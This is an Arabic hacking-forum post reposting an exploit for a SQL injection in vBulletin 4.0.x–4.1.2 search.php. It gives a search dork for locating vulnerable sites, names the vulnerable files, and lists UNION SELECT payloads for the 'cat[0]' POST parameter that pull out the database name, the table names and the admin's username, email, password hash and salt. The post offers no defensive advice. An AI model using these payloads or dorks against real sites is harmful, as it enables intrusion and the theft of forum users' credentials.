vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability...

S

SoLiTair4Ever

::. Moderators .::
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
كود: 
                                                   [B]                     vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability                 [/B]

                                                                                                                                                                                                                                                                             [INDENT]                             ==================================================  ==================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
==================================================  ==================
 
#[+] Discovered By   : [COLOR=Red]D4rkB1t[/COLOR]


Product: [URL="http://www.vbulletin.com"]vBulletin 5 Connect, The World's Leading Community Software[/URL]
Version: 4.0.x
[COLOR=Red] Dork : inurl:"search.php?search_type=1"[/COLOR]
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 [COLOR=Red]
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1#[/COLOR]
 
 
--------------------------
#        ~Advice~        #
--------------------------

[/INDENT]
 
التعديل الأخير:
اسم الموضوع : vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability | المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
أعلى